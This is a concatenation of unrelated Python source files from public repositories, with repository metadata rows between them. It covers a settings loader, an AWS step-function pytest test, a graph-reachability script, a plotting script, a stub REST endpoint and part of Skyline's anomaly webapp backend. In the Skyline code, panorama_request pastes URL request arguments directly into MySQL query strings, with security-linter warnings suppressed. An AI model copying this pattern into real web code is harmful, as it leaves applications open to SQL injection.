    Temp, currently used by standalone carbonui
    """
    import __builtin__
    if not hasattr(__builtin__, 'settings'):
        __builtin__.settings = Bunch()
    # (sectionName, identifier, format) triples for each settings section.
    sections = (('user', session.userid, 'dat'), ('char', session.charid, 'dat'), ('public', None, 'yaml'))

    def _LoadSettingsIntoBuiltins(sectionName, identifier, settingsClass, extension):
        # NOTE(review): 'key' is computed but never used.
        key = '%s%s' % (sectionName, identifier)
        filePath = blue.paths.ResolvePathForWriting(u'settings:/core_%s_%s.%s' % (sectionName, identifier or '_', extension))
        section = settingsClass(sectionName, filePath, 62, service=None)
        __builtin__.settings.Set(sectionName, section)

    # NOTE(review): the per-section format declared in 'sections' is ignored -
    # every section is loaded as a 'dat' SettingSection, although 'public' is
    # declared 'yaml' (presumably meant to use YAMLSettingSection); confirm
    # before relying on the YAML path here.
    for sectionName, identifier, format in sections:
        _LoadSettingsIntoBuiltins(sectionName, identifier, SettingSection, 'dat')
    # Pre-create the groups each consumer expects to exist.
    settings.public.CreateGroup('generic')
    settings.public.CreateGroup('device')
    settings.public.CreateGroup('ui')
    settings.public.CreateGroup('audio')
    settings.user.CreateGroup('tabgroups')
    settings.user.CreateGroup('windows')
    settings.user.CreateGroup('suppress')
    settings.user.CreateGroup('ui')
    settings.user.CreateGroup('cmd')
    settings.user.CreateGroup('localization')
    settings.char.CreateGroup('windows')
    settings.char.CreateGroup('ui')
    settings.char.CreateGroup('zaction')
def StringToUnicodeConstructor(loader, node):
    """YAML constructor that loads every scalar string as unicode (Python 2)."""
    s = loader.construct_scalar(node)
    return unicode(s)
# Names published to the client-side import machinery.
exports = {'uiutil.SettingSection': SettingSection,
           'uiutil.YAMLSettingSection': YAMLSettingSection}
| [
"billchang.e@gmail.com"
] | billchang.e@gmail.com |
470279f1566f761e2fe269c7fa4a6b4f68c48f35 | 060ce17de7b5cdbd5f7064d1fceb4ded17a23649 | /fn_aws_utilities/tests/test_funct_fn_get_step_function_execution.py | 69e85aa6d5a7b8b7d1d865e924e6b6f2ada73d71 | [
"MIT"
] | permissive | ibmresilient/resilient-community-apps | 74bbd770062a22801cef585d4415c29cbb4d34e2 | 6878c78b94eeca407998a41ce8db2cc00f2b6758 | refs/heads/main | 2023-06-26T20:47:15.059297 | 2023-06-23T16:33:58 | 2023-06-23T16:33:58 | 101,410,006 | 81 | 107 | MIT | 2023-03-29T20:40:31 | 2017-08-25T14:07:33 | Python | UTF-8 | Python | false | false | 3,073 | py | # -*- coding: utf-8 -*-
"""Tests using pytest_resilient_circuits"""
import fn_aws_utilities
from mock import patch
import pytest
from resilient_circuits.util import get_config_data, get_function_definition
from resilient_circuits import SubmitTestFunction, FunctionResult
from .mock_artifacts import mock_constants, mocked_aws_step_function
# Package and function under test.
PACKAGE_NAME = "fn_aws_utilities"
FUNCTION_NAME = "fn_get_step_function_execution"
# Read the default configuration-data section from the package
config_data = get_config_data(PACKAGE_NAME)
# Provide a simulation of the Resilient REST API (uncomment to connect to a real appliance)
resilient_mock = "pytest_resilient_circuits.BasicResilientMock"
def call_fn_get_step_function_execution_function(circuits, function_params, timeout=5):
    """Fire the function on the circuits manager and return its result value."""
    # Submit the test-function event and dispatch it.
    test_event = SubmitTestFunction("fn_get_step_function_execution", function_params)
    circuits.manager.fire(test_event)
    # The FunctionComponent fires an "exception" event if it raised an
    # exception - re-raise it here so the test fails with the real cause.
    raised = circuits.watcher.wait("exception", parent=None, timeout=timeout)
    if raised is not False:
        raise raised.args[1]
    # Otherwise collect the result event and hand back its payload.
    result_event = circuits.watcher.wait("fn_get_step_function_execution_result", parent=test_event, timeout=timeout)
    assert result_event
    assert isinstance(result_event.kwargs["result"], FunctionResult)
    pytest.wait_for(result_event, "complete", True)
    return result_event.kwargs["result"].value
class TestFnGetStepFunctionExecution:
    """ Tests for the fn_get_step_function_execution function"""

    def test_function_definition(self):
        """ Test that the package provides customization_data that defines the function """
        func = get_function_definition(PACKAGE_NAME, FUNCTION_NAME)
        assert func is not None

    # Execution ARN "0000": mocked as finished (both dates set).
    mock_inputs_1 = {
        "execution_arn": "0000"
    }
    expected_results_1 = {
        "startDate": mock_constants.get("DATE_TIME_MOCK_OBJ").strftime("%Y-%m-%d %H:%M:%S"),
        "stopDate": mock_constants.get("DATE_TIME_MOCK_OBJ").strftime("%Y-%m-%d %H:%M:%S")
    }
    # Execution ARN "1111": mocked as still running (no stop date).
    mock_inputs_2 = {
        "execution_arn": "1111"
    }
    expected_results_2 = {
        "startDate": mock_constants.get("DATE_TIME_MOCK_OBJ").strftime("%Y-%m-%d %H:%M:%S"),
        "stopDate": None
    }

    @patch("fn_aws_utilities.components.fn_get_step_function_execution.AwsStepFunction", side_effect=mocked_aws_step_function)
    @pytest.mark.parametrize("mock_inputs, expected_results", [
        (mock_inputs_1, expected_results_1),
        (mock_inputs_2, expected_results_2)
    ])
    def test_success(self, mock_aws_step_function, circuits_app, mock_inputs, expected_results):
        """ Test calling with sample values for the parameters """
        results = call_fn_get_step_function_execution_function(circuits_app, mock_inputs)
        assert(expected_results == results)
| [
"travis@example.org"
] | travis@example.org |
08a1e71a298632f21bbaf6a642b26963207b28c4 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2234/60636/265682.py | 7f5892bbcb14ddbeb52302932a7f2c3a611488fa | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,292 | py | from itertools import combinations
# Contest-style script: reads a directed graph and seed nodes from stdin and
# prints reachability information.  assumes input is: n (node count), p (seed
# count), p lines "node weight", r (edge count), r lines "u v" - TODO confirm
# against the original problem statement.
n=int(input())
p=int(input())
jiandie=[]
starts=[]
# Per-node weight table, zero-initialised.
for i in range(n):
    jiandie.append(0)
# Seed nodes (1-based in the input, stored 0-based) and their weights.
for i in range(p):
    x=input().split(" ")
    starts.append(int(x[0])-1)
    jiandie[int(x[0])-1]=int(x[1])
r=int(input())
sources=[]
# Adjacency matrix of "0"/"1" strings.
for i in range(n):
    source=[]
    for j in range(n):
        source.append("0")
    sources.append(source)
for i in range(r):
    x=input().split(" ")
    sources[int(x[0])-1][int(x[1])-1]="1"
YES=[]
NO=[]
res=[]
# BFS-like closure: for each seed, collect every node reachable from it.
for i in range(len(starts)):
    target=[]
    target.append(starts[i])
    ans=[]
    while(len(target)):
        x=target.copy()
        for a in target:
            x.pop(x.index(a))
            if not a in ans:
                ans.append(a)
            # Enqueue unseen successors of a.
            for j in range(len(sources[a])):
                if sources[a][j]=="1":
                    if not j in ans and not j in x:
                        x.append(j)
        target=x
    res.append(ans)
# NOTE(review): this merge appends bare node ids onto a list whose first
# element is itself a list (res[0]), so the printed output mixes a list with
# ints - looks suspect; confirm the intended output format.
targets=[]
targets.append(res[0])
res.pop(0)
for i in res:
    alls=[]
    for j in targets:
        if not j in alls:
            alls.append(j)
    for j in i:
        if not j in alls:
            targets.append(j)
print(targets)
| [
"1069583789@qq.com"
] | 1069583789@qq.com |
cdfe3f9d3039f42e476a4efec7a3cb47ff8b2c02 | b00840e56173dc2a196442bd354b9e3cc13b17df | /code_fargo/tutorial/compareMigrationRates.py | 55fbadae5550691b2f011813952e4c8a78bbc715 | [] | no_license | Sportsfan77777/vortex | 56c28fb760f6c98de4a7c8fdcf1168d78b4e57af | 780ec14937d1b79e91a367d58f75adc905b8eef2 | refs/heads/master | 2023-08-31T02:50:09.454230 | 2023-08-24T10:55:05 | 2023-08-24T10:55:05 | 41,785,163 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,181 | py | """
plots torque over time
*** uses a smoothing function ***
"""
import sys
import os
import subprocess
import pickle
import numpy as np
from matplotlib import pyplot as plot
from matplotlib import rcParams as rc
from scipy import signal as sig
from scipy.ndimage import filters as ff
import util
## Choose directories ##
# Simulation output directories, one curve per directory.
directories = ["earth1", "earth4", "earth16", "jupiter2", "jupiter1", "saturn1", "saturn-half"]
###############################################################################
## Set file names ##
orbit_fn = "orbit0.dat"
# Smoothing Function
smooth = lambda array, kernel_size : ff.gaussian_filter(array, kernel_size, mode = 'nearest') # smoothing filter
# Plot Parameters
kernel_size = 20
# Matplotlib "tab10" colour cycle, indexed per directory.
colors = ['#1f77b4', '#ff7f0e', '#2ca02c', '#d62728',
          '#9467bd', '#8c564b', '#e377c2', '#7f7f7f',
          '#bcbd22', '#17becf']
fontsize = 14
linewidth = 3
start_time = 10 # start time
end_time = 95 # end time
def add_track(directory, index):
    """
    Plot the smoothed migration rate -(da/dt)/a for one simulation directory.

    Fix: ``np.diff`` makes ``migration_rates`` one element shorter than
    ``times``; slicing both with indices found against ``times`` could
    therefore produce xs/ys of different lengths near the end of the data
    (a matplotlib ValueError).  Search and slice against the shortened
    time axis instead.
    """
    fn = "../%s/%s" % (directory, orbit_fn)
    data = np.loadtxt(fn)
    times = data[:, 0] / (2 * np.pi)  # Convert to orbital times
    sm_axes = data[:, 2]  # Planet Semi-Major Axis
    dt = times[1] - times[0]  # Note: output is constant
    smoothed_sm_axes = smooth(sm_axes, kernel_size)
    migration_rates = -(np.diff(smoothed_sm_axes) / dt) / smoothed_sm_axes[:-1]  # -(da/dt) / a
    rate_times = times[:-1]  # diff shortened the series by one sample
    start = np.searchsorted(rate_times, start_time)
    end = np.searchsorted(rate_times, end_time)
    xs = rate_times[start:end]
    ys = migration_rates[start:end]
    plot.plot(xs, ys, linewidth=linewidth, label=directory, c=colors[index])
def make_plot():
    """Overlay the migration-rate track of every directory on one figure."""
    # One curve per simulation directory.
    for index, simulation in enumerate(directories):
        add_track(simulation, index)
    # Titles, axis labels and legend.
    plot.title("Migration Rates", fontsize=fontsize + 2)
    plot.xlabel(r"$t$", fontsize=fontsize)
    plot.ylabel(r"$-\frac{1}{a} \frac{da}{dt}$", fontsize=fontsize)
    plot.legend(loc="upper right")
    # Axis limits (y is left to autoscale).
    plot.xlim(0, 1.5 * end_time)
    # Save, display, then clear the axes.
    plot.savefig("migrationRateComparison.png", bbox_inches='tight')
    plot.show()
    plot.cla()
### PLOTTING ###
# Script entry point: build and save the comparison figure.
make_plot()
| [
"mhammer44444@gmail.com"
] | mhammer44444@gmail.com |
c83f3d3773151f469f78e72a467dd0805bf68c6e | eb40da8906c1a03a22c4c6e2a9eb09ea8f87953c | /api/areas/areas.py | daebbec8e355ce5917c4d364ebeaa1884fad0515 | [
"MIT"
] | permissive | ufosoftwarellc/cannlytics | 677d149f64ee165c2e2adc0f3f39e618c3b2cc10 | 236bd597e30530666400fef6dceaae6de6aa587b | refs/heads/main | 2023-06-02T02:09:01.425087 | 2021-06-19T06:41:12 | 2021-06-19T06:41:12 | 377,613,147 | 0 | 0 | MIT | 2021-06-16T20:00:49 | 2021-06-16T20:00:48 | null | UTF-8 | Python | false | false | 3,025 | py | """
Areas Endpoints | Cannlytics API
Created: 5/8/2021
Updated: 5/8/2021
API endpoints to interface with areas.
"""
# External imports
from rest_framework import status
from rest_framework.decorators import api_view
from rest_framework.response import Response
# Internal imports
from api.auth import auth
@api_view(['GET', 'POST', 'DELETE'])
def areas(request, format=None):
    """Get or update information about a areas / locations.

    All three branches are still scaffolding: GET returns a hard-coded
    placeholder payload and POST/DELETE return empty data (see TODOs).
    """
    # Authenticate the user.
    # NOTE(review): uid is extracted but not used yet by any branch.
    claims = auth.verify_session(request)
    uid = claims['uid']
    if request.method == 'GET':
        # NOTE(review): org_id and ref are unused placeholders; ref still
        # contains an unfilled '%s'.
        org_id = ''
        ref = '/organizations/%s/areas'
        # TODO: If no organization is specified, get the user's
        # organizations and get all areas for all licenses.
        # IF the organization is specified, get all areas for all
        # licenses of the organization.
        # If the organization and license is specified, get all areas
        # for the given organization's license.
        # If a specific area ID is given, get only that area.
        # If a filter parameter is given, then return only the areas
        # that match the query.
        # limit = request.query_params.get('limit', None)
        # order_by = request.query_params.get('order_by', 'state')
        # data = get_collection(ref, order_by=order_by, limit=limit, filters=[])
        # Optional: If a user is using traceability, then is there any
        # need to get location data from the API, or is the data in
        # Firestore sufficient (given Firestore is syncing with Metrc).
        # Otherwise, initialize a Metrc client and get areas from Metrc.
        # traced_location = cultivator.get_locations(uid=cultivation_uid)
        # # Optional: Get any filters from dict(request.query_params)
        # NOTE(review): placeholder response left over from scaffolding.
        return Response([{'make': "Subaru", 'model': "WRX", 'price': 21000}])
    elif request.method == 'POST':
        # TODO: Either create or update the area.
        # # Create a new location using: POST /locations/v1/create
        # cultivation_name = 'MediGrow'
        # cultivation_original_name = 'medi grow'
        # cultivator.create_locations([
        #     cultivation_original_name,
        #     'Harvest Location',
        #     'Plant Location',
        #     'Warehouse',
        # ])
        # # Get created location
        # cultivation= None
        # locations = track.get_locations(action='active', license_number=cultivator.license_number)
        # for location in locations:
        #     if location.name == cultivation_original_name:
        #         cultivation = location
        # # Update the name of the location using: POST /locations/v1/update
        # cultivator.update_locations([cultivation.uid], [cultivation_name])
        return Response({'data': []})
    elif request.method == 'DELETE':
        # TODO: Archive the area data and delete from Metrc.
        return Response({'data': []})
"keeganskeate@gmail.com"
] | keeganskeate@gmail.com |
708fa4196fbd2dce037bb0ce89e5baf445a9155a | cce6101c03686898310405f089c529e65c8f68fe | /skyline/webapp/backend.py | 444984820f369ac59bdcb48ea002dc787f06ca88 | [
"MIT"
] | permissive | angry-tony/skyline | db5b776f41793eae86063a3a62ffea955eb973ab | 7ff481e2fc37831e539d431f6380b5bc6f4f75aa | refs/heads/master | 2023-03-27T10:13:55.905344 | 2021-03-09T18:08:37 | 2021-03-09T18:08:37 | 350,996,635 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 50,058 | py | import logging
from os import path
import string
import operator
import time
import re
import traceback
from flask import request
# import mysql.connector
# from mysql.connector import errorcode
# @added 20180720 - Feature #2464: luminosity_remote_data
# Added redis and msgpack
from redis import StrictRedis
from msgpack import Unpacker
# @added 20201103 - Feature #3824: get_cluster_data
import requests
# @added 20201125 - Feature #3850: webapp - yhat_values API endoint
import numpy as np
import settings
from skyline_functions import (
mysql_select,
# @added 20180720 - Feature #2464: luminosity_remote_data
# nonNegativeDerivative, in_list, is_derivative_metric,
# @added 20200507 - Feature #3532: Sort all time series
# Added sort_timeseries and removed unused in_list
nonNegativeDerivative, is_derivative_metric, sort_timeseries,
# @added 20201123 - Feature #3824: get_cluster_data
# Feature #2464: luminosity_remote_data
# Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
get_redis_conn_decoded,
# @added 20201125 - Feature #3850: webapp - yhat_values API endoint
get_graphite_metric)
import skyline_version
skyline_version = skyline_version.__absolute_version__

# Per-app logging: webapp writes to <LOG_PATH>/webapp.log.
skyline_app = 'webapp'
skyline_app_logger = '%sLog' % skyline_app
logger = logging.getLogger(skyline_app_logger)
skyline_app_logfile = '%s/%s.log' % (settings.LOG_PATH, skyline_app)
logfile = '%s/%s.log' % (settings.LOG_PATH, skyline_app)

# URL query arguments the webapp endpoints recognise.
REQUEST_ARGS = ['from_date',
                'from_time',
                'from_timestamp',
                'until_date',
                'until_time',
                'until_timestamp',
                'target',
                'like_target',
                'source',
                'host',
                'algorithm',
                # @added 20161127 - Branch #922: ionosphere
                'panorama_anomaly_id',
                ]

# Converting one settings variable into a local variable, just because it is a
# long string otherwise.
try:
    ENABLE_WEBAPP_DEBUG = settings.ENABLE_WEBAPP_DEBUG
except:
    logger.error('error :: cannot determine ENABLE_WEBAPP_DEBUG from settings')
    ENABLE_WEBAPP_DEBUG = False

# @added 20180720 - Feature #2464: luminosity_remote_data
# Added REDIS_CONN
# Redis connection over the unix socket, with auth when configured.
if settings.REDIS_PASSWORD:
    REDIS_CONN = StrictRedis(password=settings.REDIS_PASSWORD, unix_socket_path=settings.REDIS_SOCKET_PATH)
else:
    REDIS_CONN = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
def panorama_request():
    """
    Gets the details of anomalies from the database, using the URL arguments
    that are passed in by the :obj:`request.args` to build the MySQL select
    query string and queries the database, parse the results and creates an
    array of the anomalies that matched the query and creates the
    ``panaroma.json`` file, then returns the array. The Webapp needs both the
    array and the JSONP file to serve to the browser for the client side
    ``panaroma.js``.

    :param None: determined from :obj:`request.args`
    :return: array
    :rtype: array

    .. note:: And creates ``panaroma.js`` for client side javascript
    """
    # Two modes: with no request args the latest 10 anomalies are returned;
    # otherwise a search query is built from the args.  A count_by_metric arg
    # switches from a per-anomaly search to a per-metric count.
    logger.info('determining request args')

    def get_ids_from_rows(thing, rows):
        # Flatten the first column of the rows into a 'id1, id2, ...'
        # string suitable for a SQL IN (...) clause.
        found_ids = []
        for row in rows:
            found_id = str(row[0])
            found_ids.append(int(found_id))
        # @modified 20191014 - Task #3270: Deprecate string.replace for py3
        # Branch #3262: py3
        # ids_first = string.replace(str(found_ids), '[', '')
        # in_ids = string.replace(str(ids_first), ']', '')
        found_ids_str = str(found_ids)
        ids_first = found_ids_str.replace('[', '')
        in_ids = ids_first.replace(']', '')
        return in_ids

    try:
        request_args_len = len(request.args)
    except:
        request_args_len = False
    latest_anomalies = False
    if request_args_len == 0:
        request_args_len = 'No request arguments passed'
        # return str(request_args_len)
        latest_anomalies = True
    # NOTE(review): metric is hard-coded False here so this branch is dead
    # code - it looks like a leftover short-circuit for metric id lookups.
    metric = False
    if metric:
        logger.info('Getting db id for %s' % metric)
        # @modified 20170913 - Task #2160: Test skyline with bandit
        # Added nosec to exclude from bandit tests
        query = 'select id from metrics WHERE metric=\'%s\'' % metric  # nosec
        try:
            result = mysql_select(skyline_app, query)
        except:
            logger.error('error :: failed to get id from db: %s' % traceback.format_exc())
            result = 'metric id not found in database'
        return str(result[0][0])
    search_request = True
    count_request = False
    if latest_anomalies:
        logger.info('Getting latest anomalies')
        # @modified 20191108 - Feature #3306: Record the anomaly_end_timestamp
        # Branch #3262: py3
        # query = 'select id, metric_id, anomalous_datapoint, anomaly_timestamp, full_duration, created_timestamp from anomalies ORDER BY id DESC LIMIT 10'
        query = 'select id, metric_id, anomalous_datapoint, anomaly_timestamp, full_duration, created_timestamp, anomaly_end_timestamp from anomalies ORDER BY id DESC LIMIT 10'
        try:
            rows = mysql_select(skyline_app, query)
        except:
            logger.error('error :: failed to get anomalies from db: %s' % traceback.format_exc())
            rows = []
    if not latest_anomalies:
        # Build the WHERE clause incrementally from the request args;
        # needs_and tracks whether a WHERE has already been added.
        logger.info('Determining search parameters')
        # @modified 20191108 - Feature #3306: Record the end_timestamp of anomalies
        # Branch #3262: py3
        # query_string = 'select id, metric_id, anomalous_datapoint, anomaly_timestamp, full_duration, created_timestamp from anomalies'
        query_string = 'select id, metric_id, anomalous_datapoint, anomaly_timestamp, full_duration, created_timestamp, anomaly_end_timestamp from anomalies'
        needs_and = False
        # If we have to '' a string we cannot escape the query it seems...
        # NOTE(review): do_not_escape is never used.
        do_not_escape = False
        if 'metric' in request.args:
            metric = request.args.get('metric', None)
            if metric and metric != 'all':
                # @modified 20170913 - Task #2160: Test skyline with bandit
                # Added nosec to exclude from bandit tests
                query = "select id from metrics WHERE metric='%s'" % (metric)  # nosec
                try:
                    found_id = mysql_select(skyline_app, query)
                except:
                    logger.error('error :: failed to get app ids from db: %s' % traceback.format_exc())
                    found_id = None
                if found_id:
                    target_id = str(found_id[0][0])
                    if needs_and:
                        new_query_string = '%s AND metric_id=%s' % (query_string, target_id)
                    else:
                        new_query_string = '%s WHERE metric_id=%s' % (query_string, target_id)
                    query_string = new_query_string
                    needs_and = True
        if 'metric_like' in request.args:
            metric_like = request.args.get('metric_like', None)
            if metric_like and metric_like != 'all':
                # @modified 20170913 - Task #2160: Test skyline with bandit
                # Added nosec to exclude from bandit tests
                query = 'select id from metrics WHERE metric LIKE \'%s\'' % (str(metric_like))  # nosec
                try:
                    rows = mysql_select(skyline_app, query)
                except:
                    logger.error('error :: failed to get metric ids from db: %s' % traceback.format_exc())
                    return False
                rows_returned = None
                try:
                    rows_returned = rows[0]
                    if ENABLE_WEBAPP_DEBUG:
                        logger.info('debug :: rows - rows[0] - %s' % str(rows[0]))
                except:
                    rows_returned = False
                    if ENABLE_WEBAPP_DEBUG:
                        logger.info('debug :: no rows returned')
                if rows_returned:
                    ids = get_ids_from_rows('metric', rows)
                    new_query_string = '%s WHERE metric_id IN (%s)' % (query_string, str(ids))
                else:
                    # Get nothing
                    new_query_string = '%s WHERE metric_id IN (0)' % (query_string)
                    if ENABLE_WEBAPP_DEBUG:
                        logger.info('debug :: no rows returned using new_query_string - %s' % new_query_string)
                query_string = new_query_string
                needs_and = True
        if 'count_by_metric' in request.args:
            count_by_metric = request.args.get('count_by_metric', None)
            if count_by_metric and count_by_metric != 'false':
                # Switch to count mode: one row per metric with its count.
                search_request = False
                count_request = True
                # query_string = 'SELECT metric_id, COUNT(*) FROM anomalies GROUP BY metric_id ORDER BY COUNT(*) DESC'
                query_string = 'SELECT metric_id, COUNT(*) FROM anomalies'
                needs_and = False
        if 'from_timestamp' in request.args:
            from_timestamp = request.args.get('from_timestamp', None)
            if from_timestamp and from_timestamp != 'all':
                # A 'YYYYMMDD HH:MM' value is converted to a unix timestamp.
                if ":" in from_timestamp:
                    import time
                    import datetime
                    new_from_timestamp = time.mktime(datetime.datetime.strptime(from_timestamp, '%Y%m%d %H:%M').timetuple())
                    from_timestamp = str(int(new_from_timestamp))
                if needs_and:
                    new_query_string = '%s AND anomaly_timestamp >= %s' % (query_string, from_timestamp)
                    query_string = new_query_string
                    needs_and = True
                else:
                    new_query_string = '%s WHERE anomaly_timestamp >= %s' % (query_string, from_timestamp)
                    query_string = new_query_string
                    needs_and = True
        if 'until_timestamp' in request.args:
            until_timestamp = request.args.get('until_timestamp', None)
            if until_timestamp and until_timestamp != 'all':
                if ":" in until_timestamp:
                    import time
                    import datetime
                    new_until_timestamp = time.mktime(datetime.datetime.strptime(until_timestamp, '%Y%m%d %H:%M').timetuple())
                    until_timestamp = str(int(new_until_timestamp))
                if needs_and:
                    new_query_string = '%s AND anomaly_timestamp <= %s' % (query_string, until_timestamp)
                    query_string = new_query_string
                    needs_and = True
                else:
                    new_query_string = '%s WHERE anomaly_timestamp <= %s' % (query_string, until_timestamp)
                    query_string = new_query_string
                    needs_and = True
        if 'app' in request.args:
            app = request.args.get('app', None)
            if app and app != 'all':
                # @modified 20170913 - Task #2160: Test skyline with bandit
                # Added nosec to exclude from bandit tests
                query = 'select id from apps WHERE app=\'%s\'' % (str(app))  # nosec
                try:
                    found_id = mysql_select(skyline_app, query)
                except:
                    logger.error('error :: failed to get app ids from db: %s' % traceback.format_exc())
                    found_id = None
                if found_id:
                    target_id = str(found_id[0][0])
                    if needs_and:
                        new_query_string = '%s AND app_id=%s' % (query_string, target_id)
                    else:
                        new_query_string = '%s WHERE app_id=%s' % (query_string, target_id)
                    query_string = new_query_string
                    needs_and = True
        if 'source' in request.args:
            source = request.args.get('source', None)
            if source and source != 'all':
                # @modified 20170913 - Task #2160: Test skyline with bandit
                # Added nosec to exclude from bandit tests
                query = 'select id from sources WHERE source=\'%s\'' % (str(source))  # nosec
                try:
                    found_id = mysql_select(skyline_app, query)
                except:
                    logger.error('error :: failed to get source id from db: %s' % traceback.format_exc())
                    found_id = None
                if found_id:
                    target_id = str(found_id[0][0])
                    if needs_and:
                        new_query_string = '%s AND source_id=\'%s\'' % (query_string, target_id)
                    else:
                        new_query_string = '%s WHERE source_id=\'%s\'' % (query_string, target_id)
                    query_string = new_query_string
                    needs_and = True
        if 'algorithm' in request.args:
            algorithm = request.args.get('algorithm', None)
            # DISABLED as it is difficult match algorithm_id in the
            # triggered_algorithms csv list
            algorithm = 'all'
            if algorithm and algorithm != 'all':
                # @modified 20170913 - Task #2160: Test skyline with bandit
                # Added nosec to exclude from bandit tests
                query = 'select id from algorithms WHERE algorithm LIKE \'%s\'' % (str(algorithm))  # nosec
                try:
                    rows = mysql_select(skyline_app, query)
                except:
                    logger.error('error :: failed to get algorithm ids from db: %s' % traceback.format_exc())
                    rows = []
                ids = get_ids_from_rows('algorithm', rows)
                if needs_and:
                    new_query_string = '%s AND algorithm_id IN (%s)' % (query_string, str(ids))
                else:
                    new_query_string = '%s WHERE algorithm_id IN (%s)' % (query_string, str(ids))
                query_string = new_query_string
                needs_and = True
        if 'host' in request.args:
            host = request.args.get('host', None)
            if host and host != 'all':
                # @modified 20170913 - Task #2160: Test skyline with bandit
                # Added nosec to exclude from bandit tests
                query = 'select id from hosts WHERE host=\'%s\'' % (str(host))  # nosec
                try:
                    found_id = mysql_select(skyline_app, query)
                except:
                    logger.error('error :: failed to get host id from db: %s' % traceback.format_exc())
                    found_id = None
                if found_id:
                    target_id = str(found_id[0][0])
                    if needs_and:
                        new_query_string = '%s AND host_id=\'%s\'' % (query_string, target_id)
                    else:
                        new_query_string = '%s WHERE host_id=\'%s\'' % (query_string, target_id)
                    query_string = new_query_string
                    needs_and = True
        if 'limit' in request.args:
            limit = request.args.get('limit', '10')
        else:
            limit = '10'
        if 'order' in request.args:
            order = request.args.get('order', 'DESC')
        else:
            order = 'DESC'
        search_query = '%s ORDER BY id %s LIMIT %s' % (
            query_string, order, limit)
        if 'count_by_metric' in request.args:
            count_by_metric = request.args.get('count_by_metric', None)
            if count_by_metric and count_by_metric != 'false':
                # query_string = 'SELECT metric_id, COUNT(*) FROM anomalies GROUP BY metric_id ORDER BY COUNT(*) DESC'
                search_query = '%s GROUP BY metric_id ORDER BY COUNT(*) %s LIMIT %s' % (
                    query_string, order, limit)
        try:
            rows = mysql_select(skyline_app, search_query)
        except:
            logger.error('error :: failed to get anomalies from db: %s' % traceback.format_exc())
            rows = []
    anomalies = []
    anomalous_metrics = []
    if search_request:
        # @modified 20191014 - Task #3270: Deprecate string.replace for py3
        # Branch #3262: py3
        anomalies_json = path.abspath(path.join(path.dirname(__file__), '..', settings.ANOMALY_DUMP))
        # panorama_json = string.replace(str(anomalies_json), 'anomalies.json', 'panorama.json')
        panorama_json = anomalies_json.replace('anomalies.json', 'panorama.json')
        if ENABLE_WEBAPP_DEBUG:
            logger.info('debug :: panorama_json - %s' % str(panorama_json))
    for row in rows:
        # Row layout differs per mode: search rows start (id, metric_id, ...),
        # count rows are (metric_id, count).
        if search_request:
            anomaly_id = str(row[0])
            metric_id = str(row[1])
        if count_request:
            metric_id = str(row[0])
            anomaly_count = str(row[1])
        # @modified 20170913 - Task #2160: Test skyline with bandit
        # Added nosec to exclude from bandit tests
        query = 'select metric from metrics WHERE id=%s' % metric_id  # nosec
        try:
            result = mysql_select(skyline_app, query)
        except:
            logger.error('error :: failed to get id from db: %s' % traceback.format_exc())
            continue
        metric = str(result[0][0])
        if search_request:
            anomalous_datapoint = str(row[2])
            # NOTE(review): the next assignment is duplicated verbatim.
            anomaly_timestamp = str(row[3])
            anomaly_timestamp = str(row[3])
            full_duration = str(row[4])
            created_timestamp = str(row[5])
            # @modified 20191108 - Feature #3306: Record the anomaly_end_timestamp
            # Branch #3262: py3
            # anomaly_data = (anomaly_id, metric, anomalous_datapoint, anomaly_timestamp, full_duration, created_timestamp)
            # anomalies.append([int(anomaly_id), str(metric), anomalous_datapoint, anomaly_timestamp, full_duration, created_timestamp])
            anomaly_end_timestamp = str(row[6])
            # NOTE(review): anomaly_data is assigned but never used.
            anomaly_data = (anomaly_id, metric, anomalous_datapoint, anomaly_timestamp, full_duration, created_timestamp, anomaly_end_timestamp)
            anomalies.append([int(anomaly_id), str(metric), anomalous_datapoint, anomaly_timestamp, full_duration, created_timestamp, anomaly_end_timestamp])
            anomalous_metrics.append(str(metric))
        if count_request:
            # Cap the per-metric link limit the UI will use at 100.
            limit_argument = anomaly_count
            if int(anomaly_count) > 100:
                limit_argument = 100
            anomaly_data = (int(anomaly_count), metric, str(limit_argument))
            anomalies.append([int(anomaly_count), str(metric), str(limit_argument)])
    anomalies.sort(key=operator.itemgetter(int(0)))
    if search_request:
        # Truncate the file, then write the JSONP payload.
        with open(panorama_json, 'w') as fh:
            pass
        # Write anomalous_metrics to static webapp directory
        with open(panorama_json, 'a') as fh:
            # Make it JSONP with a handle_data() function
            fh.write('handle_data(%s)' % anomalies)
    if latest_anomalies:
        return anomalies
    else:
        return search_query, anomalies
def get_list(thing):
    """
    Get a list of names for things in a database table.

    :param thing: the thing, e.g. 'algorithm'
    :type thing: str
    :return: list
    :rtype: list
    """
    table = '%ss' % thing
    # Identifiers cannot be bound as query parameters so they are
    # interpolated directly - thing is only ever an internal value.
    query = 'select %s from %s' % (thing, table)  # nosec
    logger.info('select %s from %s' % (thing, table))  # nosec
    # Removed the unused got_results / test_results / results_array_valid
    # flag dance and narrowed the bare excepts.
    try:
        results = mysql_select(skyline_app, query)
    except Exception:
        logger.error('error :: failed to get list of %ss from %s' % (thing, table))
        results = None
    things = []
    if results:
        logger.info('results: %s' % str(results))
        for result in results:
            things.append(str(result[0]))
        logger.info('things: %s' % str(things))
    else:
        # None (query failed) or an empty result set.
        logger.error('error :: invalid results array for get list of %ss from %s' % (thing, table))
    return things
# @added 20180720 - Feature #2464: luminosity_remote_data
# @modified 20201203 - Feature #3860: luminosity - handle low frequency data
# Add the metric resolution
# def luminosity_remote_data(anomaly_timestamp):
def luminosity_remote_data(anomaly_timestamp, resolution):
    """
    Gets all the unique_metrics from Redis and then mgets Redis data for all
    metrics. The data is then preprocessed for the remote Skyline luminosity
    instance and only the relevant fragments of the time series are
    returned. This return is then gzipped by the Flask Webapp response to
    ensure the minimum about of bandwidth is used.

    :param anomaly_timestamp: the anomaly timestamp
    :type anomaly_timestamp: int
    :param resolution: the metric resolution in seconds, used to size the
